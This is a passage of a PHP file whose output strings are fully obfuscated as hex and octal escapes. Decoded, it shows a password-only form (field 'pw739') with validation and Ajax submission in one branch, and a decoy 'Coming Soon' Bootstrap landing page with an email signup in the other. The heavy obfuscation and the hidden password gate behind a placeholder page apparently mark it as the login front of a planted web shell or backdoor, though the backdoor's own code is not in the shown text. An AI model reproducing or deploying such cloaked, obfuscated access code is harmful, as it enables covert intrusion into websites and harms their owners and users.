40\x20\40\x20\40\146\145\x65\144\x62\x61\143\153\x49\143\157\x6e\x73\72\40\x7b\12\x20\40\40\x20\xa\x20\40\40\x20\x20\x20\40\40\40\40\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\40\x20\40\40\40\166\141\154\151\x64\72\x20\42\147\154\x79\x70\150\151\143\157\x6e\x22\x2c\12\x20\x20\40\40\xa\40\x20\x20\x20\40\40\40\40\x20\x20\40\40\40\x20\40\40\x20\x20\x20\x20\40\40\40\40\x20\40\40\40\x69\156\x76\141\154\151\x64\x3a\40\x22\x66\141\40\146\141\55\145\170\x63\x6c\141\155\x61\x74\151\x6f\x6e\55\x63\x69\162\143\154\x65\x20\x66\x61\55\x6c\147\x22\x2c\12\x20\40\x20\40\xa\x20\x20\40\40\x20\40\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\x20\40\40\x20\x20\40\40\x20\40\40\x20\x76\141\x6c\151\144\141\164\x69\x6e\x67\72\40\42\147\x6c\171\x70\150\151\x63\x6f\x6e\40\147\154\171\x70\x68\x69\143\157\156\x2d\x72\145\146\x72\145\x73\x68\x22\xa\x20\40\40\40\12\x20\40\40\40\x20\x20\x20\40\x20\40\40\40\40\x20\40\40\40\40\40\40\40\40\x20\x20\175\x2c\12\x20\40\40\40\xa\x20\40\x20\40\x20\40\x20\x20\40\40\x20\x20\x20\40\40\x20\40\40\x20\40\40\x20\40\40\146\x69\x65\x6c\144\163\x3a\x20\173\xa\40\x20\x20\x20\12\40\40\x20\40\x20\40\40\40\40\x20\40\40\40\x20\40\x20\40\40\40\40\40\x20\40\40\40\x20\40\x20\x70\x77\x37\x33\71\72\x20\173\12\40\x20\40\x20\12\x20\x20\40\x20\x20\40\40\40\40\40\x20\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\40\40\x20\x20\40\40\x20\166\141\154\x69\144\141\x74\x6f\162\x73\72\40\x7b\12\x20\x20\x20\40\xa\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x20\40\40\40\x20\x20\x20\40\40\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\156\157\x74\x45\x6d\160\x74\171\72\40\x7b\12\40\40\40\x20\xa\40\40\x20\40\x20\40\40\x20\40\x20\40\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x20\40\x20\40\40\x20\x20\x20\x20\40\40\x20\40\x20\40\x20\40\155\x65\163\163\141\x67\145\x3a\40\42\120\x6c\145\141\163\145\x20\x65\x6e\x74\x65\162\x20\x79\x6f\165\x72\40\160\141\x73\x73\167\x6f\x72\x64\42\xa\40\40\x20\x20\xa\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\x20\x20\40\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\175\x2c\xa\x20\40\40\40\xa\40\40\40\x20\x20\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\x20\163\x74\x72\151\156\147\114\x65\x6e\147\x74\x68\72\40\173\xa\x20\40\40\x20\xa\40\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\40\40\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\40\x6d\151\x6e\x3a\40\x36\x2c\12\40\40\x20\x20\xa\40\x20\40\x20\40\x20\x20\x20\40\40\40\40\x20\40\x20\x20\40\x20\x20\x20\40\40\x20\x20\40\x20\x20\40\40\40\40\40\x20\x20\40\x20\40\40\x20\x20\155\145\x73\x73\141\x67\145\72\40\42\x59\157\x75\162\x20\160\x61\163\x73\167\x6f\162\144\x20\x6d\165\x73\x74\x20\142\x65\x20\x61\164\40\x6c\145\x61\163\x74\40\66\x20\x63\150\141\162\141\143\x74\145\162\163\40\x6c\x6f\156\147\x22\12\40\40\40\x20\xa\40\40\x20\x20\x20\40\40\40\40\x20\40\40\40\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\40\x20\40\40\x20\40\40\40\40\x20\x20\40\175\12\x20\x20\x20\40\xa\x20\x20\x20\x20\40\40\40\x20\40\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\40\x20\x20\40\x20\40\x20\x7d\12\40\40\40\x20\12\x20\40\x20\40\x20\40\x20\40\x20\40\x20\40\x20\x20\x20\x20\40\x20\40\x20\40\x20\x20\x20\x20\40\40\40\175\54\12\x20\40\x20\x20\12\x20\40\40\40\12\x20\x20\40\40\12\40\x20\x20\x20\40\40\x20\40\40\40\40\x20\40\x20\40\40\40\x20\x20\40\x20\40\40\x20\x7d\12\x20\x20\x20\40\12\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\175\x29\xa\40\x20\x20\40\12\x20\x20\x20\40\xa\40\40\40\x20\12\x20\x20\40\x20\xa\x20\40\40\40\xa\x20\40\x20\x20\40\40\40\x20\x20\40\40\x20\x20\x20\40\x20\x20\40\x20\x20\x2e\x6f\x6e\50\x22\163\x75\x63\143\x65\x73\x73\x2e\146\157\x72\x6d\56\142\x76\42\54\x20\146\x75\156\x63\164\x69\x6f\156\50\x65\x29\x20\x7b\12\40\x20\x20\x20\12\40\40\x20\x20\40\40\x20\40\x20\40\x20\40\x20\40\40\x20\x20\x20\x20\x20\40\40\40\40\x24\x28\42\x23\163\x75\x63\x63\145\163\x73\x5f\x6d\145\x73\163\x61\147\x65\42\51\56\163\x6c\x69\144\x65\104\x6f\167\x6e\x28\x7b\xa\x20\40\x20\40\12\x20\40\40\x20\40\40\40\x20\x20\40\40\40\x20\40\40\x20\x20\x20\40\40\x20\x20\40\x20\x20\40\40\x20\157\x70\x61\x63\x69\x74\171\72\40\42\163\150\x6f\167\42\12\40\x20\x20\40\12\40\x20\40\40\x20\x20\40\40\40\40\40\x20\40\x20\x20\40\40\40\x20\40\x20\x20\x20\40\175\x2c\x20\42\x73\x6c\x6f\167\42\x29\x20\x2f\57\x20\104\x6f\x20\x73\157\x6d\x65\164\x68\x69\x6e\x67\x20\x2e\x2e\x2e\12\40\40\40\x20\12\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\40\x20\40\40\x20\44\x28\42\x23\x72\145\x67\137\x66\157\162\155\x22\x29\56\x64\x61\164\141\x28\x22\x62\157\x6f\x74\163\164\162\x61\x70\126\141\154\151\144\141\164\x6f\162\42\51\x2e\162\x65\x73\145\x74\106\x6f\162\155\x28\x29\73\12\40\40\40\x20\12\x20\40\40\40\12\40\x20\x20\x20\12\x20\x20\x20\40\40\40\40\40\x20\40\40\40\40\x20\x20\x20\x20\x20\x20\40\40\x20\40\x20\x2f\57\40\120\x72\x65\166\145\x6e\x74\40\x66\157\162\155\x20\x73\165\142\x6d\x69\x73\163\x69\157\156\12\40\x20\x20\x20\12\40\x20\x20\40\40\40\40\40\x20\40\40\x20\40\x20\x20\x20\x20\x20\40\40\x20\40\40\40\x65\x2e\160\x72\x65\x76\x65\156\164\104\x65\x66\141\x75\154\x74\x28\51\73\xa\x20\x20\x20\40\12\x20\40\40\40\xa\40\x20\x20\40\12\40\40\40\40\x20\40\40\x20\40\40\40\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\57\57\x20\x47\x65\164\40\x74\x68\x65\40\x66\x6f\162\x6d\40\x69\x6e\x73\x74\x61\156\x63\x65\12\x20\x20\40\x20\xa\40\x20\40\x20\x20\x20\40\x20\x20\x20\x20\40\x20\x20\40\40\40\x20\x20\x20\40\40\40\40\166\141\162\40\x24\146\157\x72\x6d\x20\x3d\40\x24\x28\145\x2e\x74\141\162\x67\145\x74\x29\x3b\12\40\40\x20\x20\12\x20\x20\40\40\xa\x20\x20\x20\40\12\x20\x20\40\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\x20\40\40\40\40\x20\x20\x2f\57\x20\107\145\x74\40\x74\x68\145\x20\x42\157\157\x74\x73\164\162\141\160\x56\x61\154\x69\x64\141\164\157\x72\40\x69\156\163\164\x61\x6e\143\145\xa\40\x20\40\40\xa\x20\x20\x20\40\x20\40\40\40\40\40\x20\40\40\x20\40\x20\40\40\x20\40\40\40\x20\x20\x76\x61\x72\x20\x62\166\x20\75\x20\44\x66\157\x72\155\x2e\144\141\164\x61\x28\x22\142\157\157\x74\x73\164\x72\x61\160\126\x61\154\x69\144\141\x74\x6f\x72\x22\x29\x3b\12\40\x20\x20\x20\xa\x20\x20\x20\x20\xa\x20\x20\x20\40\12\x20\40\40\40\40\40\x20\40\x20\40\40\x20\x20\40\x20\40\x20\40\40\40\40\x20\x20\40\57\57\40\125\x73\x65\40\x41\x6a\x61\x78\40\164\x6f\x20\163\165\142\x6d\x69\x74\40\x66\x6f\162\x6d\x20\x64\x61\x74\x61\12\40\40\40\x20\xa\40\40\40\40\40\40\x20\40\x20\40\40\x20\40\40\40\40\40\x20\x20\x20\x20\40\40\40\44\56\x70\157\163\164\50\x24\146\x6f\162\155\56\141\164\x74\162\x28\x22\x61\x63\x74\x69\x6f\x6e\x22\x29\x2c\40\x24\x66\157\162\x6d\56\x73\x65\162\151\141\x6c\x69\x7a\145\50\51\x2c\x20\146\x75\x6e\143\x74\151\x6f\156\x28\x72\x65\163\x75\x6c\x74\51\x20\173\xa\x20\x20\40\x20\xa\x20\x20\x20\40\40\x20\40\x20\40\x20\40\40\40\x20\40\40\40\x20\40\x20\x20\40\x20\40\40\40\40\40\143\157\x6e\163\157\x6c\x65\x2e\154\157\147\50\162\x65\x73\x75\154\164\51\73\12\x20\x20\40\40\12\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\40\x7d\54\40\x22\152\x73\x6f\156\42\x29\73\xa\40\40\x20\40\12\x20\40\40\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\40\40\x20\40\40\40\x7d\x29\73\xa\40\40\40\x20\xa\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\40\175\51\73\xa\40\x20\x20\x20\12\40\40\x20\x20\40\x20\40\x20\74\x2f\x73\x63\162\151\x70\x74\76\12\40\x20\40\x20\12\40\40\40\40\xa\x20\x20\x20\x20\xa\40\x20\x20\40"; } else { echo "\74\x21\104\x4f\103\124\x59\120\x45\x20\150\164\155\154\x3e\12\x3c\x68\x74\x6d\x6c\x20\x6c\x61\156\147\x3d\x22\x65\x6e\55\x55\x53\x22\x3e\xa\x20\40\x3c\x68\x65\x61\144\76\xa\x20\40\x20\40\x3c\155\x65\x74\x61\40\x63\x68\141\x72\163\145\164\75\42\x55\x54\x46\x2d\x38\42\76\12\40\x20\40\x20\74\155\x65\x74\x61\x20\150\164\164\160\55\145\161\x75\151\166\75\x22\x58\x2d\125\101\55\x43\157\155\x70\x61\x74\151\x62\154\x65\x22\x20\143\157\156\x74\x65\156\x74\75\42\x49\x45\75\145\x64\x67\x65\x22\76\12\x20\x20\x20\x20\74\155\x65\164\x61\x20\156\x61\155\145\75\42\166\151\145\167\x70\x6f\x72\164\42\x20\x63\157\156\164\x65\156\164\75\x22\x77\151\144\164\150\75\x64\x65\166\x69\143\x65\x2d\167\x69\144\x74\x68\54\40\151\156\x69\164\151\x61\154\55\x73\143\141\x6c\x65\x3d\61\42\76\xa\40\x20\40\x20\74\164\151\x74\154\145\x3e\103\157\155\151\x6e\147\x20\x53\x6f\157\156\40\102\157\x6f\164\x73\164\x72\141\x70\40\x54\145\155\x70\x6c\x61\x74\x65\x20\x2d\40\103\157\155\x69\x6e\147\x20\123\157\157\156\x3c\x2f\164\151\164\154\x65\76\12\40\40\x20\40\74\x6c\x69\156\x6b\40\162\x65\154\x3d\x22\x70\x72\x65\x63\x6f\156\x6e\145\143\164\42\x20\x68\x72\145\146\x3d\42\150\x74\164\x70\163\x3a\x2f\57\146\157\x6e\x74\163\56\x67\x73\164\141\164\x69\x63\x2e\x63\x6f\x6d\42\x20\143\x72\x6f\163\163\x6f\x72\x69\x67\151\156\75\42\143\162\x6f\x73\x73\x6f\162\151\x67\x69\156\x22\57\x3e\xa\40\x20\x20\x20\74\x6c\151\x6e\153\40\x72\x65\154\75\42\160\x72\x65\154\x6f\141\144\42\x20\x61\163\75\42\163\x74\171\154\145\x22\40\150\x72\145\146\75\42\150\164\x74\160\x73\72\x2f\57\x66\x6f\x6e\164\163\x2e\147\x6f\x6f\x67\x6c\x65\141\160\x69\x73\56\x63\157\155\57\143\x73\x73\x32\x3f\x66\x61\x6d\151\154\x79\x3d\121\165\x69\143\x6b\x73\141\156\x64\x3a\x77\x67\150\164\100\x33\60\60\73\64\x30\60\x3b\65\x30\x30\x3b\67\60\x30\x26\141\155\160\73\x64\151\x73\160\154\141\x79\x3d\x73\167\x61\160\42\57\x3e\xa\40\40\40\40\x3c\x6c\x69\x6e\x6b\x20\162\145\x6c\75\x22\163\x74\x79\154\145\163\x68\145\x65\164\x22\40\150\162\145\x66\75\42\150\164\x74\160\163\x3a\57\x2f\x66\157\x6e\x74\x73\x2e\x67\x6f\157\x67\x6c\145\x61\x70\x69\163\56\143\157\155\57\x63\163\163\62\x3f\146\141\155\151\x6c\x79\x3d\121\165\151\x63\x6b\x73\x61\156\144\72\167\x67\x68\x74\100\x33\60\x30\73\64\60\x30\x3b\65\60\60\73\67\60\x30\x26\141\155\x70\73\x64\151\163\x70\154\141\171\75\163\167\141\160\42\x20\x6d\145\x64\x69\x61\x3d\42\160\x72\151\x6e\x74\x22\40\157\x6e\154\157\x61\144\x3d\42\x74\150\151\163\56\x6d\x65\x64\151\141\75\x22\141\154\x6c\x22\42\57\76\12\x20\40\x20\x20\x3c\156\157\163\143\x72\x69\x70\164\x3e\xa\40\x20\40\40\x20\40\74\x6c\x69\156\153\x20\162\x65\154\75\x22\x73\164\x79\x6c\x65\163\x68\x65\145\164\42\40\x68\162\x65\x66\75\x22\150\x74\164\x70\163\72\x2f\x2f\x66\157\156\164\x73\56\x67\157\157\147\154\x65\141\160\151\x73\x2e\143\x6f\x6d\x2f\x63\163\163\62\77\x66\141\x6d\151\x6c\171\x3d\x51\165\x69\143\x6b\163\x61\156\144\x3a\x77\x67\150\164\x40\63\60\60\x3b\64\60\x30\x3b\65\x30\x30\73\x37\x30\60\x26\141\155\160\73\144\151\x73\x70\154\141\x79\75\163\167\x61\160\42\x2f\76\xa\40\40\40\x20\x3c\x2f\x6e\x6f\163\143\162\x69\160\164\76\12\x20\x20\x20\40\74\154\151\x6e\x6b\40\x68\162\x65\x66\x3d\42\x2e\x2e\x2f\56\56\57\x63\x73\163\57\142\x6f\157\x74\163\164\x72\141\x70\56\x6d\x69\x6e\56\143\163\163\x3f\166\145\162\x3d\61\56\62\x2e\60\42\x20\162\145\x6c\x3d\42\x73\164\x79\154\x65\x73\x68\x65\145\x74\x22\76\12\x20\x20\40\40\x3c\x6c\151\156\153\40\150\162\145\146\75\42\x2e\56\x2f\x2e\56\57\143\x73\x73\x2f\146\157\156\x74\55\141\167\x65\163\157\x6d\x65\x2f\x63\x73\163\x2f\141\x6c\x6c\56\155\151\156\x2e\143\x73\x73\77\x76\145\x72\x3d\x31\56\62\56\x30\42\x20\x72\145\154\x3d\42\163\164\x79\154\x65\163\x68\145\x65\x74\x22\x3e\12\x20\40\x20\40\74\154\x69\x6e\x6b\40\x68\162\x65\146\75\42\x2e\x2e\57\56\x2e\x2f\x63\x73\163\57\x6d\141\x69\156\56\143\x73\x73\77\166\x65\162\x3d\61\56\x32\56\60\42\40\x72\145\154\x3d\42\x73\164\171\x6c\x65\163\150\x65\x65\164\42\x3e\12\x20\40\74\57\150\145\x61\144\76\xa\x20\x20\x3c\142\157\x64\171\x20\x69\144\x3d\x22\x74\157\160\42\76\x3c\x64\x69\x76\x20\143\154\141\163\163\x3d\42\x73\x69\164\145\x2d\167\162\x61\160\160\145\x72\42\76\xa\x20\40\74\x64\151\x76\40\143\154\x61\x73\163\x3d\42\x73\151\164\x65\55\167\162\141\x70\x70\145\x72\55\x69\156\156\x65\x72\x22\76\12\40\x20\x20\x20\74\144\x69\x76\40\x63\x6c\141\163\x73\75\42\143\157\x76\145\x72\x2d\x63\x6f\x6e\164\141\151\156\145\162\42\x3e\xa\x20\40\x20\x20\40\40\74\144\x69\166\x20\143\x6c\x61\163\163\x3d\42\x6d\141\163\164\150\145\141\144\40\x63\154\145\x61\162\x66\151\170\42\76\12\x20\x20\x20\x20\x20\40\40\x20\74\x64\x69\x76\40\143\x6c\x61\x73\163\x3d\42\151\x6e\x6e\145\x72\42\x3e\12\40\x20\40\x20\40\40\x20\x20\x20\40\x3c\x68\x33\x20\x63\x6c\x61\163\x73\x3d\42\155\141\x73\164\150\145\x61\x64\x2d\x62\162\x61\156\x64\42\x3e\103\157\x6d\x69\156\147\x20\x53\157\157\x6e\74\57\x68\x33\76\xa\40\40\40\40\40\40\40\40\x20\40\74\156\141\x76\x20\x63\154\x61\x73\163\75\42\x6e\141\x76\x20\156\x61\x76\x2d\155\141\x73\164\x68\x65\141\x64\42\x3e\xa\40\40\x20\x20\40\40\x20\40\40\40\40\x20\74\x61\x20\143\154\x61\163\x73\75\42\156\141\x76\55\x6c\151\x6e\153\x20\156\141\x76\55\x73\x6f\143\151\x61\154\42\40\x68\162\x65\146\x3d\x22\x23\42\x20\x74\x69\x74\x6c\145\x3d\42\x46\x61\143\145\x62\157\x6f\x6b\42\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\75\42\x66\x61\142\40\x66\x61\x2d\x66\x61\143\145\142\x6f\157\153\55\x66\x22\40\141\x72\x69\x61\x2d\150\151\x64\144\145\x6e\75\42\x74\162\165\x65\42\x3e\74\x2f\151\x3e\74\x2f\x61\76\xa\x20\x20\40\x20\40\40\40\40\x20\40\40\40\74\141\40\x63\154\141\163\163\75\42\x6e\x61\166\55\x6c\x69\156\153\40\x6e\x61\x76\x2d\x73\x6f\143\x69\141\x6c\42\x20\x68\x72\145\x66\x3d\42\43\x22\40\x74\x69\x74\x6c\x65\75\x22\124\x77\151\164\x74\145\x72\42\x3e\x3c\x69\40\143\154\141\163\x73\x3d\42\x66\141\x62\40\x66\141\x2d\164\x77\x69\x74\164\x65\162\42\40\x61\162\151\141\x2d\150\x69\x64\x64\145\x6e\x3d\42\164\x72\165\x65\42\76\x3c\x2f\x69\76\74\57\x61\76\12\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\40\74\x61\x20\143\x6c\x61\x73\x73\x3d\x22\x6e\141\x76\x2d\154\151\x6e\153\x20\156\x61\166\55\163\x6f\143\x69\141\x6c\x22\40\150\162\x65\x66\75\x22\43\42\40\x74\151\x74\x6c\x65\x3d\42\131\157\x75\164\x75\142\145\x22\x3e\74\151\40\x63\154\x61\163\x73\x3d\x22\x66\x61\x62\40\x66\x61\55\171\x6f\x75\x74\x75\142\145\x22\40\141\x72\151\x61\x2d\150\151\144\144\x65\156\x3d\x22\164\162\165\x65\42\76\x3c\x2f\x69\76\x3c\57\x61\x3e\xa\x20\40\x20\40\40\40\x20\40\40\x20\x20\40\x3c\141\40\143\x6c\x61\x73\163\75\x22\156\x61\x76\x2d\x6c\x69\x6e\153\x20\156\x61\x76\55\163\157\143\151\141\154\42\x20\x68\x72\145\146\x3d\x22\43\x22\x20\164\151\x74\x6c\x65\75\42\x49\156\x73\x74\141\x67\x72\141\155\x22\x3e\74\x69\40\x63\154\141\163\163\75\x22\146\x61\142\40\x66\141\x2d\151\156\x73\x74\141\147\162\x61\155\x22\40\141\162\x69\141\55\150\151\144\144\145\x6e\75\42\x74\x72\165\x65\42\76\74\x2f\151\76\74\x2f\141\x3e\xa\x20\40\x20\x20\40\x20\x20\x20\x20\x20\74\57\x6e\141\166\76\xa\x20\x20\40\x20\x20\40\x20\x20\74\57\x64\x69\166\76\12\40\x20\40\x20\40\x20\74\x2f\144\x69\166\x3e\40\40\x20\40\x20\x20\xa\x20\x20\40\x20\x20\x20\x3c\144\x69\166\x20\143\x6c\x61\163\x73\x3d\x22\151\156\x6e\145\162\40\x63\x6f\166\x65\162\42\x3e\xa\x20\x20\x20\40\x20\x20\40\40\74\150\x31\40\143\x6c\x61\x73\x73\x3d\x22\143\x6f\x76\x65\162\x2d\x68\145\x61\144\x69\x6e\x67\x22\x3e\124\x68\x65\x20\141\x64\166\145\x6e\x74\x75\162\x65\40\x42\145\x67\x69\x6e\x73\x3c\57\x68\x31\76\12\40\x20\40\x20\x20\40\40\x20\74\160\x20\143\x6c\141\x73\x73\x3d\x22\154\x65\x61\x64\x20\143\157\x76\145\162\55\x63\x6f\x70\171\x22\x3e\x48\157\x6c\x64\x20\x74\x69\x67\150\164\40\141\x73\40\x77\145\40\x67\x65\x74\x20\157\165\162\40\167\x6f\162\153\151\156\147\x20\162\157\x62\157\164\x73\40\164\x6f\147\x65\164\x68\145\x72\x20\141\156\144\40\160\x72\x6f\x64\165\x63\145\40\164\150\x65\40\155\157\163\164\x20\141\163\x74\x6f\156\x69\163\x68\151\x6e\x67\40\160\162\157\144\165\x63\164\x20\x65\166\x65\162\x2e\x3c\x2f\x70\76\xa\40\x20\x20\x20\40\40\x20\x20\x3c\160\x20\143\154\x61\163\163\x3d\42\x6c\145\x61\144\42\x3e\x3c\x62\x75\x74\164\157\x6e\40\164\171\x70\x65\x3d\42\142\x75\164\164\157\156\42\40\x63\x6c\x61\x73\163\x3d\42\x62\x74\x6e\40\142\164\x6e\55\x6c\147\40\x62\x74\156\55\144\145\x66\x61\x75\x6c\x74\x20\142\164\156\55\156\157\x74\x69\146\171\42\40\144\x61\x74\141\x2d\164\157\x67\147\x6c\x65\75\42\155\157\144\x61\x6c\x22\40\x64\141\164\141\x2d\164\x61\x72\147\x65\164\75\42\43\163\165\142\163\x63\162\x69\142\145\x4d\x6f\144\x61\154\x22\76\x4e\157\x74\151\146\171\x20\x4d\145\74\x2f\142\x75\x74\164\157\156\x3e\74\57\x70\76\xa\40\40\40\x20\x20\40\74\x2f\x64\x69\166\x3e\xa\x20\x20\40\40\40\40\x3c\144\x69\166\x20\143\154\141\x73\x73\x3d\42\155\x61\x73\x74\x66\x6f\x6f\x74\x22\76\12\x20\x20\x20\x20\x20\40\x20\x20\74\144\x69\x76\x20\143\154\x61\163\163\x3d\42\151\156\x6e\145\162\x22\x3e\12\x20\40\x20\x20\x20\x20\x20\x20\74\57\x64\151\x76\76\12\40\40\x20\40\40\x20\x3c\x2f\144\x69\166\76\xa\40\x20\40\40\40\x20\x3c\144\x69\166\40\143\x6c\x61\x73\163\x3d\x22\x6d\x6f\x64\141\x6c\40\146\141\144\x65\x22\x20\x69\x64\x3d\42\163\165\142\x73\143\162\x69\x62\145\x4d\157\x64\141\154\x22\40\164\141\x62\x69\156\x64\145\170\75\x22\55\61\x22\40\x72\x6f\x6c\x65\x3d\42\x64\x69\141\154\157\x67\x22\40\141\x72\x69\141\55\x6c\x61\142\x65\154\x6c\x65\144\x62\x79\x3d\x22\163\x75\142\163\143\x72\x69\142\x65\x4d\157\144\x61\x6c\114\x61\x62\145\x6c\x22\x20\x61\x72\151\x61\55\150\x69\144\x64\145\x6e\75\x22\x74\x72\x75\145\42\x3e\12\40\40\x20\x20\40\x20\x20\x20\74\x64\151\x76\40\x63\154\x61\x73\x73\x3d\42\x6d\157\x64\x61\154\x2d\144\x69\141\x6c\157\147\x22\x20\x72\x6f\x6c\x65\x3d\x22\144\157\143\x75\x6d\145\x6e\x74\x22\x3e\xa\40\40\40\40\x20\x20\40\x20\40\x20\x3c\x64\151\166\40\x63\154\x61\163\x73\75\x22\x6d\157\144\x61\154\55\x63\157\156\164\x65\156\x74\42\76\xa\40\x20\40\x20\x20\40\40\x20\40\40\40\40\74\144\151\166\x20\143\154\x61\163\163\75\42\155\x6f\144\141\154\55\150\145\x61\144\145\x72\x22\76\xa\x20\x20\40\40\40\40\40\40\40\x20\x20\x20\x20\40\74\150\65\x20\143\x6c\141\x73\163\x3d\x22\155\157\x64\x61\x6c\55\x74\151\x74\x6c\145\42\x20\151\x64\75\42\x73\x75\142\x73\143\x72\151\x62\x65\115\x6f\x64\141\x6c\114\141\142\145\x6c\42\76\107\x65\x74\x20\x4e\157\x74\x69\146\151\145\x64\x20\157\x6e\40\114\x61\x75\156\143\150\x3a\x3c\57\x68\65\x3e\xa\40\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\74\x62\165\164\x74\x6f\x6e\40\x74\x79\x70\x65\x3d\42\x62\x75\x74\164\x6f\x6e\x22\40\143\154\x61\163\163\75\x22\143\154\x6f\163\145\42\x20\144\141\x74\x61\55\x64\x69\163\x6d\x69\163\163\x3d\x22\x6d\157\144\141\154\42\x20\141\x72\x69\x61\x2d\x6c\x61\x62\145\154\x3d\x22\x43\x6c\x6f\163\145\x22\x3e\12\x20\40\40\40\x20\x20\x20\40\x20\40\40\x20\40\x20\40\x20\x3c\x73\160\x61\x6e\x20\x61\162\151\x61\x2d\150\151\x64\144\x65\156\75\42\164\162\165\x65\x22\76\x26\164\x69\x6d\145\x73\x3b\x3c\57\163\x70\x61\x6e\76\12\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\74\x2f\142\165\x74\164\157\156\76\12\x20\x20\x20\40\40\40\x20\x20\40\40\40\40\x3c\57\x64\x69\166\76\xa\x20\x20\40\40\40\40\40\40\x20\x20\x20\x20\x3c\144\x69\x76\40\143\x6c\x61\163\x73\x3d\x22\x6d\x6f\144\141\154\x2d\142\157\x64\171\42\x3e\12\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\40\x20\40\40\x3c\146\157\162\155\76\12\40\40\x20\40\x20\x20\40\40\40\x20\40\40\x20\40\x20\40\74\x64\151\x76\40\x63\x6c\x61\x73\163\x3d\x22\146\157\x72\x6d\55\147\x72\157\x75\x70\x22\x3e\12\x20\x20\40\x20\40\40\x20\40\40\40\40\40\40\40\40\x20\x20\40\74\x6c\141\x62\145\154\x20\146\x6f\162\x3d\42\162\x65\143\x69\160\151\x65\x6e\164\55\156\141\155\x65\42\x20\143\x6c\x61\163\163\75\x22\146\157\162\155\55\x63\x6f\156\x74\162\157\154\55\x6c\x61\x62\145\154\42\x3e\x45\156\164\145\x72\x20\171\157\x75\40\x65\x2d\155\141\x69\154\40\x74\x6f\40\147\145\164\x20\x6e\157\x74\x69\x66\x69\145\x64\40\167\150\x65\x6e\40\x77\x65\40\x6c\x61\165\x6e\x63\150\x3c\57\x6c\141\142\145\x6c\76\xa\x20\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\x20\x20\x20\74\x69\x6e\160\165\x74\40\164\171\x70\x65\x3d\x22\x74\145\170\x74\42\40\143\154\x61\x73\163\75\42\146\157\162\x6d\x2d\143\157\156\x74\x72\157\x6c\x22\40\x69\144\75\x22\x72\145\x63\x69\160\x69\x65\156\164\55\156\x61\x6d\145\x22\40\160\154\141\x63\x65\150\x6f\154\144\145\x72\75\42\x79\157\165\x72\x2d\156\x61\155\x65\100\145\170\141\155\x70\x6c\145\56\143\x6f\x6d\42\x3e\xa\x20\x20\40\x20\40\x20\x20\40\x20\x20\x20\40\40\40\x20\x20\74\57\x64\x69\166\x3e\12\x20\40\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\40\74\57\146\x6f\x72\x6d\x3e\12\x20\x20\x20\x20\40\x20\40\x20\40\x20\40\40\74\x2f\x64\x69\x76\x3e\xa\40\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\74\144\x69\x76\x20\143\x6c\141\x73\163\75\x22\x6d\157\144\x61\x6c\x2d\146\157\157\164\145\162\x22\x3e\12\x20\40\40\40\40\40\40\40\x20\40\x20\40\x20\x20\74\x62\165\164\x74\157\x6e\40\x74\x79\160\x65\x3d\42\142\x75\x74\164\157\x6e\42\x20\x63\x6c\141\x73\163\75\42\142\x74\x6e\x20\x62\x74\156\x2d\144\145\146\x61\165\x6c\164\42\76\x53\x75\142\163\x63\162\x69\x62\145\74\x2f\142\165\164\164\x6f\156\x3e\xa\40\40\40\40\40\x20\x20\x20\40\x20\x20\x20\x3c\57\x64\x69\166\76\xa\x20\40\40\x20\x20\40\x20\40\x20\x20\x3c\x2f\x64\x69\x76\x3e\12\40\x20\x20\x20\40\40\x20\x20\74\57\144\151\x76\x3e\12\x20\x20\40\40\74\x2f\144\x69\x76\x3e\xa\x20\x20\x3c\57\144\151\x76\76\12\74\x2f\x64\151\166\x3e\xa\x20\40\x20\x20\x3c\x73\x63\162\x69\x70\164\x20\x73\162\143\75\42\56\56\x2f\x2e\x2e\57\163\x63\x72\x69\160\x74\x73\57\x6a\161\x75\x65\x72\x79\56\163\x6c\151\x6d\x2e\155\151\156\x2e\x6a\x73\77\166\145\x72\75\61\x2e\62\56\60\42\76\x3c\x2f\163\143\162\151\x70\164\x3e\12\x20\x20\x20\x20\x3c\163\x63\x72\151\160\164\x20\163\162\143\x3d\42\x2e\56\x2f\56\56\x2f\163\143\162\151\x70\164\x73\x2f\142\157\157\164\x73\x74\x72\141\x70\56\x62\x75\x6e\144\154\x65\56\x6d\151\156\x2e\x6a\x73\x3f\x76\145\x72\x3d\61\56\62\56\60\42\76\74\x2f\x73\x63\162\151\x70\164\x3e\xa\40\40\x20\x20\74\163\x63\x72\151\x70\164\x20\163\162\143\x3d\x22\56\x2e\x2f\x2e\56\57\x73\x63\162\151\x70\164\x73\x2f\x6d\x61\151\156\x2e\x6a\x73\x3f\166\x65\162\x3d\61\x2e\62\x2e\x30\42\x3e\74\x2f\163\x63\162\x69\x70\164\76\xa\x20\x20\74\57\x62\x6f\x64\x79\x3e\12\74\57\x68\x74\x6d\x6